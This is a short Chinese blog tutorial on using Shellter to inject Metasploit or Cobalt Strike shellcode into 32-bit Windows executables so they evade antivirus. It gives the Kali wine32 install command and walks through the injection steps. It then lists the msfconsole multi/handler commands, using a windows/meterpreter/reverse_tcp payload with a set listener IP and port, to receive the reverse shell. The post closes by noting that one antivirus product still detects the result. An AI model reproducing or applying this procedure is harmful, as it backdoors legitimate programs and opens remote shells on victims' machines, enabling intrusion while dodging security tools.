Shellcode注入工具Shellter
2021-11-30 本文已影响0人
doinb1517
01.png
介绍
Shellter 是一款动态 shellcode 注入工具,我们可以将shellcode注入到其它程序上,从而来躲避杀毒软件的查杀。shellcode可以是自己写的也可以是使用MSF或者CS生成的。目前Shellter的最新版本是v7.2
下载地址:https://www.shellterproject.com/
两种模式,自动模式和管理模式(更自由属于高级模式)
02.png
安装
在kali上使用需要安装wine和wine32(可以让linux运行exe),wine是kali自带,使用如下命令安装wine32
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
选择一个exe可执行文件(32位)
03.png
是否启用隐身模式,建议不启用,可以增加免杀效果
04.png
选择payload,这里选择本地自带的payload
05.png
设置IP和Port
06.png
可以看到进行注入后的程序甚至比原程序更小了,有点离谱。
07.png
上线msf
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.182.61.116
set lport 4444
exploit //监听
08.png
使用火绒进行查杀,发现可以被识别。
09.png
